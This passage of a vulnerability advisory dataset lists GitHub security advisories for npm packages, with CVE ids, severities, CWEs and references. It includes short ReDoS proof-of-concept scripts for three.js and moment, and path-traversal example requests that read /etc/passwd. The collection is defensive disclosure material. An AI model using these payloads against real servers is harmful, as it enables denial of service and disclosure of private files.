This affects the package three before 0.125.0. This can happen when handling rgb or hsl colors. PoC: var three = require('three') function build_blank (n) { var ret = "rgb(" for (var i = 0; i < n; i++) { ret += " " } return ret + ""; } var Color = three.Color var time = Date.now(); new Color(build_blank(50000)) var time_cost = Date.now() - time; console.log(time_cost+" ms")
{'CVE-2020-28496'}
2021-02-24T07:40:52Z
2021-03-01T19:57:16Z
HIGH
null
{'CWE-400'}
{'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1065972', 'https://github.com/mrdoob/three.js/issues/21132', 'https://snyk.io/vuln/SNYK-JS-THREE-1064931', 'https://nvd.nist.gov/vuln/detail/CVE-2020-28496', 'https://github.com/mrdoob/three.js/pull/21143/commits/4a582355216b620176a291ff319d740e619d583e'}
null
npm
GHSA-8948-ffc6-jg52
Insecure Default Configuration in redbird
Versions of `redbird` prior to 0.9.1 have a vulnerable default configuration of allowing TLS 1.0 connections on `lib/proxy.js`. The package does not provide an option to disable TLS 1.0 which is deprecated and vulnerable. ## Recommendation Upgrade to version 0.9.1 or later.
null
2021-08-04T20:58:53Z
2019-06-06T15:32:21Z
MODERATE
null
{'CWE-20'}
{'https://github.com/OptimalBits/redbird/commit/39c7a2da84a2ddddfe046ea80e98800518920516', 'https://github.com/OptimalBits/redbird/pull/207', 'https://www.npmjs.com/advisories/828', 'https://snyk.io/vuln/SNYK-JS-REDBIRD-174455'}
null
npm
GHSA-gc94-6w89-hpqr
Command Injection in fs-path
All versions of `fs-path` are vulnerable to command injection is unsanitized user input is passed in. ## Recommendation No fix is currently available for this vulnerability. It is our recommendation to not install or use this module until a fix is available.
null
2021-09-16T20:59:56Z
2019-06-12T16:37:07Z
HIGH
null
{'CWE-77', 'CWE-62'}
{'https://hackerone.com/reports/324491', 'https://nodesecurity.io/advisories/661', 'https://www.npmjs.com/advisories/661', 'https://github.com/pillys/fs-path'}
null
npm
GHSA-w7wg-24g3-2c78
Malicious Package in requset
All versions of `requset` typosquatted a popular package of similar name and tracked users who had installed the incorrect package. The package uploaded information to a remote server including: name of the downloaded package, name of the intended package, the Node version and whether the process was running as sudo. There is no further compromise. ## Recommendation Remove the package from your dependencies and always ensure package names are typed correctly upon installation.
null
2021-09-30T20:29:47Z
2020-09-02T21:14:17Z
CRITICAL
null
{'CWE-506'}
{'https://www.npmjs.com/advisories/869'}
null
npm
GHSA-mpgr-2cx9-327h
Information disclosure in SSB-DB
### Impact _What kind of vulnerability is it? Who is impacted?_ Servers running SSB-DB 20.0.0 (which is packaged with SSB-Server 16.0.0) must upgrade immediately. **There is no evidence that other SSB apps are vulnerable or that this problem has been exploited in the wild.** The `get()` method is supposed to only decrypt messages when you explicitly ask it to, but there's a bug where it's decrypting any message that it can. This means that it's returning the decrypted content of private messages, which a malicious peer could use to get access to private data. This only affects peers running SSB-DB@20.0.0 who also have private messages, and is only known to be exploitable if you're also running SSB-OOO (default in SSB-Server), which exposes a thin wrapper around `get()` to anonymous peers. ### Patches _Has the problem been patched? What versions should users upgrade to?_ Yes, please upgrade to SSB-DB 20.0.1 (or SSB-Server 16.0.1) immediately. ### Workarounds _Is there a way for users to fix or remediate the vulnerability without upgrading?_ You may be able to disable the most obvious attack vector, SSB-OOO, by disabling the plugin, but you should upgrade immediately anyway. ### For more information If you have any questions or comments about this advisory, open an issue in [SSB-DB](https://github.com/ssbc/ssb-db/)
{'CVE-2020-4045'}
2021-01-08T20:12:11Z
2020-06-11T21:09:04Z
HIGH
null
{'CWE-200'}
{'https://github.com/ssbc/ssb-db/commit/43334d0871c9cc6220e0f6d6338499060f7761d4', 'https://nvd.nist.gov/vuln/detail/CVE-2020-4045', 'https://github.com/ssbc/ssb-db/security/advisories/GHSA-mpgr-2cx9-327h'}
null
npm
GHSA-vx5w-cxch-wwc9
Path Traversal in f-serv
All versions of `f-serv` are vulnerable to Path Traversal. Due to insufficient input sanitization in URLs, attackers can access server files by using relative paths when fetching files. ## Recommendation No fix is currently available. Consider using an alternative package until a fix is made available.
null
2020-08-31T18:46:58Z
2020-09-03T19:02:27Z
CRITICAL
null
{'CWE-22'}
{'https://www.npmjs.com/advisories/1092'}
null
npm
GHSA-mxhp-79qh-mcx6
taffy can allow access to any data items in the DB
taffy through 2.6.2 allows attackers to forge adding additional properties into user-input processed by taffy which can allow access to any data items in the DB. taffy sets an internal index for each data item in its DB. However, it is found that the internal index can be forged by adding additional properties into user-input. If index is found in the query, taffyDB will ignore other query conditions and directly return the indexed data item. Moreover, the internal index is in an easily-guessable format (e.g., T000002R000001). As such, attackers can use this vulnerability to access any data items in the DB.
{'CVE-2019-10790'}
2021-07-28T18:32:27Z
2020-02-19T16:43:42Z
HIGH
null
{'CWE-668', 'CWE-20'}
{'https://snyk.io/vuln/SNYK-JS-TAFFY-546521', 'https://www.npmjs.com/package/taffy', 'https://nvd.nist.gov/vuln/detail/CVE-2019-10790'}
null
npm
GHSA-6m6m-j2hm-pxrg
Malicious Package in cicada-render
All versions of `cicada-render` contain malicious code. The package uploads system information to a remote server, downloads a file and executes it. ## Recommendation Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
null
2021-09-30T19:33:36Z
2020-09-03T17:37:05Z
CRITICAL
null
{'CWE-506'}
{'https://www.npmjs.com/advisories/1051'}
null
npm
GHSA-qm4q-f956-fg64
Malicious Package in luna-mock
All versions of `luna-mock` contain malicious code. The package uploads system information to a remote server, downloads a file and executes it. ## Recommendation Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
null
2021-09-30T19:50:00Z
2020-09-03T17:39:13Z
CRITICAL
null
{'CWE-506'}
{'https://www.npmjs.com/advisories/1055'}
null
npm
GHSA-3rpr-mg43-xhq4
High severity vulnerability that affects auth0-js
A cross-origin vulnerability has been discovered in the Auth0 auth0.js library affecting versions &lt; 8.12. This vulnerability allows an attacker to acquire authenticated users' tokens and invoke services on a user's behalf if the target site or application uses a popup callback page with auth0.popup.callback().
{'CVE-2017-17068'}
2021-08-31T21:24:03Z
2017-12-21T00:47:20Z
HIGH
null
{'CWE-200'}
{'https://github.com/advisories/GHSA-3rpr-mg43-xhq4', 'https://auth0.com/docs/security/bulletins/cve-2017-17068', 'https://appcheck-ng.com/appcheck-discovers-vulnerability-auth0-library-cve-2017-17068/', 'https://nvd.nist.gov/vuln/detail/CVE-2017-17068'}
null
npm
GHSA-87vv-r9j6-g5qv
Regular Expression Denial of Service in moment
Versions of `moment` prior to 2.11.2 are affected by a regular expression denial of service vulnerability. The vulnerability is triggered when arbitrary user input is passed into `moment.duration()`. ## Proof of concept ``` var moment = require('moment'); var genstr = function (len, chr) { var result = ""; for (i=0; i<=len; i++) { result = result + chr; } return result; } for (i=20000;i<=10000000;i=i+10000) { console.log("COUNT: " + i); var str = '-' + genstr(i, '1') console.log("LENGTH: " + str.length); var start = process.hrtime(); moment.duration(str) var end = process.hrtime(start); console.log(end); } ``` ### Results ``` $ node moment.js COUNT: 20000 LENGTH: 20002 [ 0, 618931029 ] COUNT: 30001 LENGTH: 30003 [ 1, 401413894 ] COUNT: 40002 LENGTH: 40004 [ 2, 437075303 ] COUNT: 50003 LENGTH: 50005 [ 3, 824664804 ] COUNT: 60004 LENGTH: 60006 [ 5, 651335262 ] ``` ## Recommendation Please update to version 2.11.2 or later.
{'CVE-2016-4055'}
2021-09-07T14:33:22Z
2017-10-24T18:33:35Z
MODERATE
null
{'CWE-400'}
{'https://lists.apache.org/thread.html/10f0f3aefd51444d1198c65f44ffdf2d78ca3359423dbc1c168c9731@%3Cdev.flink.apache.org%3E', 'https://www.npmjs.com/advisories/55', 'https://www.tenable.com/security/tns-2019-02', 'http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html', 'https://nvd.nist.gov/vuln/detail/CVE-2016-4055', 'https://github.com/advisories/GHSA-87vv-r9j6-g5qv', 'http://www.securityfocus.com/bid/95849', 'https://nodesecurity.io/advisories/55', 'https://lists.apache.org/thread.html/54df3aeb4239b64b50b356f0ca6f986e3c4ca5b84c515dce077c7854@%3Cuser.flink.apache.org%3E', 'https://lists.apache.org/thread.html/17ff53f7999e74fbe3cc0ceb4e1c3b00b180b7c5afec8e978837bc49@%3Cuser.flink.apache.org%3E', 'https://lists.apache.org/thread.html/52bafac05ad174000ea465fe275fd3cc7bd5c25535a7631c0bc9bfb2@%3Cuser.flink.apache.org%3E', 'http://www.openwall.com/lists/oss-security/2016/04/20/11'}
null
npm
GHSA-5rm3-qhxf-rh3r
Downloads Resources over HTTP in co-cli-installer
Affected versions of `co-cli-installer` insecurely download an executable over an unencrypted HTTP connection. In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `co-cli-installer`. ## Recommendation No patch is currently available for this vulnerability. The best mitigation is currently to avoid using this package, using a different package if available. Alternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.
{'CVE-2016-10657'}
2021-01-08T19:48:25Z
2019-02-18T23:45:10Z
HIGH
null
{'CWE-311'}
{'https://nvd.nist.gov/vuln/detail/CVE-2016-10657', 'https://nodesecurity.io/advisories/268', 'https://www.npmjs.com/advisories/268', 'https://github.com/advisories/GHSA-5rm3-qhxf-rh3r'}
null
npm
GHSA-8c3f-x5f9-6h62
Command injection in @diez/generation
The `@diez/generation` npm package is a client for Diez. The locateFont method of @diez/generation has a command injection vulnerability. Clients of the @diez/generation library are unlikely to be aware of this, so they might unwittingly write code that contains a vulnerability. This issue may lead to remote code execution if a client of the library calls the vulnerable method with untrusted input. All versions of this package are vulnerable as of the writing of this CVE.
{'CVE-2021-32830'}
2021-08-26T14:39:22Z
2021-09-02T17:08:20Z
LOW
null
{'CWE-77', 'CWE-78'}
{'https://nvd.nist.gov/vuln/detail/CVE-2021-32830', 'https://www.npmjs.com/package/@diez/generation', 'https://github.com/diez/diez', 'https://securitylab.github.com/advisories/GHSL-2021-061-diez-generation-cmd-injection/'}
null
npm
GHSA-wxrm-2h86-v95f
Malicious Package in pizza-pasta
Version 1.0.3 of `pizza-pasta` contains malicious code as a install scripts. The package created folders in the system's Desktop and downloaded an image from `imgur.com`. The package also printed the users SSH keys to the console. ## Recommendation Remove the package from your environment. There are no evidences of further compromise.
null
2021-09-29T20:45:26Z
2020-09-03T21:04:20Z
CRITICAL
null
{'CWE-506'}
{'https://www.npmjs.com/advisories/1196'}
null
npm
GHSA-vgjp-vh3c-32v3
Directory Traversal in mockserve
Affected versions of `mockserve` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system. Example request: ``` GET /../../../../../../../../../../etc/passwd HTTP/1.1 host:foo ``` ## Recommendation No patch is available for this vulnerability. It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.
{'CVE-2017-16146'}
2020-08-31T18:23:25Z
2018-07-23T20:46:55Z
HIGH
null
{'CWE-22'}
{'https://github.com/advisories/GHSA-vgjp-vh3c-32v3', 'https://www.npmjs.com/advisories/445', 'https://nvd.nist.gov/vuln/detail/CVE-2017-16146', 'https://nodesecurity.io/advisories/445', 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/mockserve'}
null
npm
GHSA-cvfm-xjc8-f2vm
Denial of Service in @commercial/subtext
Version 5.1.1 of `@commercial/subtext` is vulnerable to Denial of Service. The Content-Encoding HTTP header parser has a vulnerability which will cause the function to throw a system error if the header contains some invalid values. Because hapi rethrows system errors (as opposed to catching expected application errors), the error is thrown all the way up the stack. If no unhandled exception handler is available, the application will exist, allowing an attacker to shut down services. ## Recommendation Upgrade to version 5.1.2 or later.
null
2020-08-31T19:00:44Z
2020-09-03T15:46:36Z
HIGH
null
null
{'https://www.npmjs.com/advisories/1477'}
null
npm
GHSA-2598-2f59-rmhq
SQL Injection in sequelize
Versions of `sequelize` prior to 3.35.1 are vulnerable to SQL Injection. The package fails to sanitize JSON path keys in the Postgres dialect, which may allow attackers to inject SQL statements and execute arbitrary SQL queries. ## Recommendation Upgrade to version 3.35.1 or later.
{'CVE-2019-10749'}
2021-08-18T22:10:20Z
2019-11-08T17:05:17Z
CRITICAL
null
{'CWE-89'}
{'https://nvd.nist.gov/vuln/detail/CVE-2019-10749', 'https://snyk.io/vuln/SNYK-JS-SEQUELIZE-450222', 'https://www.npmjs.com/advisories/1017', 'https://github.com/sequelize/sequelize/commit/ee4017379db0059566ecb5424274ad4e2d66bc68'}
null
npm
GHSA-wh33-4p32-g7vh
Directory Traversal in serverxxx
Affected versions of `serverxxx` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system. Example request: ``` GET /../../../../../../../../../../etc/passwd HTTP/1.1 host:foo ``` ## Recommendation No patch is available for this vulnerability. It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.
{'CVE-2017-16182'}
2020-08-31T18:23:48Z
2018-07-23T20:43:56Z
HIGH
null
{'CWE-22'}
{'https://github.com/advisories/GHSA-wh33-4p32-g7vh', 'https://nvd.nist.gov/vuln/detail/CVE-2017-16182', 'https://nodesecurity.io/advisories/455', 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/serverxxx', 'https://www.npmjs.com/advisories/455'}
null
npm
GHSA-cf4h-3jhx-xvhq
Arbitrary Code Execution in underscore
The package `underscore` from 1.13.0-0 and before 1.13.0-2, from 1.3.2 and before 1.12.1 are vulnerable to Arbitrary Code Execution via the template function, particularly when a variable property is passed as an argument as it is not sanitized.
{'CVE-2021-23358'}
2021-08-25T17:37:24Z
2021-05-06T16:09:43Z
HIGH
null
{'CWE-94'}
{'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBJASHKENAS-1081505', 'https://www.tenable.com/security/tns-2021-14', 'https://lists.apache.org/thread.html/re69ee408b3983b43e9c4a82a9a17cbbf8681bb91a4b61b46f365aeaf@%3Cissues.cordova.apache.org%3E', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EOKATXXETD2PF3OR36Q5PD2VSVAR6J5Z/', 'https://lists.apache.org/thread.html/r5df90c46f7000c4aab246e947f62361ecfb849c5a553dcdb0ef545e1@%3Cissues.cordova.apache.org%3E', 'https://github.com/jashkenas/underscore/releases/tag/1.12.1', 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1081504', 'https://www.debian.org/security/2021/dsa-4883', 'https://www.npmjs.com/package/underscore', 'https://lists.debian.org/debian-lts-announce/2021/03/msg00038.html', 'https://github.com/jashkenas/underscore', 'https://github.com/jashkenas/underscore/blob/master/modules/template.js%23L71', 'https://snyk.io/vuln/SNYK-JS-UNDERSCORE-1080984', 'https://lists.apache.org/thread.html/r770f910653772317b117ab4472b0a32c266ee4abbafda28b8a6f9306@%3Cissues.cordova.apache.org%3E', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FGEE7U4Z655A2MK5EW4UQQZ7B64XJWBV/', 'https://github.com/jashkenas/underscore/commit/4c73526d43838ad6ab43a6134728776632adeb66', 'https://lists.apache.org/thread.html/rbc84926bacd377503a3f5c37b923c1931f9d343754488d94e6f08039@%3Cissues.cordova.apache.org%3E', 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1081503', 'https://lists.apache.org/thread.html/raae088abdfa4fbd84e1d19d7a7ffe52bf8e426b83e6599ea9a734dba@%3Cissues.cordova.apache.org%3E', 'https://github.com/jashkenas/underscore/pull/2917', 'https://nvd.nist.gov/vuln/detail/CVE-2021-23358'}
null
npm
GHSA-4g77-cvgw-grvw
Prototype Pollution in putil-merge
This affects the package putil-merge before 3.8.0. The merge() function does not check the values passed into the argument. An attacker can supply a malicious value by adjusting the value to include the constructor property. Note: This vulnerability derives from an incomplete fix in https://security.snyk.io/vuln/SNYK-JS-PUTILMERGE-1317077
{'CVE-2021-23470'}
2022-02-11T16:15:46Z
2022-02-05T00:00:31Z
HIGH
null
{'CWE-1321'}
{'https://github.com/panates/putil-merge/', 'https://snyk.io/vuln/SNYK-JS-PUTILMERGE-2391487', 'https://github.com/panates/putil-merge/commit/476d00078dfb2827d7c9ee0f2392c81b864f7bc5', 'https://nvd.nist.gov/vuln/detail/CVE-2021-23470'}
null
npm
GHSA-cq8r-fc3q-6hg2
Denial of Service (DoS) via the unsetByPath function in jsjoints
The package jointjs before 3.3.0 are vulnerable to Denial of Service (DoS) via the unsetByPath function.
{'CVE-2020-28479'}
2021-04-06T20:51:59Z
2021-04-13T15:29:40Z
HIGH
null
{'CWE-400'}
{'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1062039', 'https://github.com/clientIO/joint/commit/ec7ab01b512a3c06a9944a25d50f255bf07c3499', 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1062040', 'https://github.com/clientIO/joint/releases/tag/v3.3.0', 'https://snyk.io/vuln/SNYK-JS-JOINTJS-1062038', 'https://nvd.nist.gov/vuln/detail/CVE-2020-28479'}
null
npm
GHSA-p4mf-4qvh-w8g5
Malicious Package in bitcionjslib
All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets. ## Recommendation Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
null
2021-10-01T20:39:41Z
2020-09-04T15:41:42Z
CRITICAL
null
{'CWE-506'}
{'https://www.npmjs.com/advisories/1361'}
null
npm
GHSA-6495-8jvh-f28x
File restriction bypass in socket.io-file
All versions of `socket.io-file`are vulnerable to a file restriction bypass. The validation for valid file types only happens on the client-side, which allows an attacker to intercept the Websocket request post-validation and alter the `name` value to upload any file types. No fix is currently available. Consider using an alternative package until a fix is made available.
null
2021-10-04T21:23:14Z
2020-10-02T15:39:54Z
HIGH
null
{'CWE-20'}
{'https://nvd.nist.gov/vuln/detail/CVE-2020-24807', 'https://github.com/rico345100/socket.io-file', 'https://www.npmjs.com/advisories/1564'}
null
npm
GHSA-rwcq-qpm6-7867
Malicious Package in riped160
All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets. ## Recommendation Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
null
2021-10-01T21:04:25Z
2020-09-03T17:04:32Z
CRITICAL
null
{'CWE-506'}
{'https://www.npmjs.com/advisories/1403'}
null
npm
GHSA-72q2-5rxx-xfff
Downloads Resources over HTTP in gfe-sass
Affected versions of `gfe-sass` insecurely download an executable over an unencrypted HTTP connection. In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `gfe-sass`. ## Recommendation No patch is currently available for this vulnerability. The best mitigation is currently to avoid using this package, using a different package if available. Alternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.
{'CVE-2017-16040'}
2021-01-14T15:56:52Z
2020-09-01T16:12:12Z
HIGH
null
{'CWE-311'}
{'https://nvd.nist.gov/vuln/detail/CVE-2017-16040', 'https://www.npmjs.com/advisories/291', 'https://nodesecurity.io/advisories/291'}
null
npm
GHSA-8qpm-5c82-rf96
Prototype Pollution in backbone-query-parameters
Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') in backbone-query-parameters 0.4.0 allows a malicious user to inject properties into Object.prototype.
{'CVE-2021-20085'}
2021-04-26T19:07:16Z
2021-05-06T15:52:02Z
HIGH
null
{'CWE-1321'}
{'https://nvd.nist.gov/vuln/detail/CVE-2021-20085', 'https://github.com/BlackFan/client-side-prototype-pollution/blob/master/pp/backbone-qp.md'}
null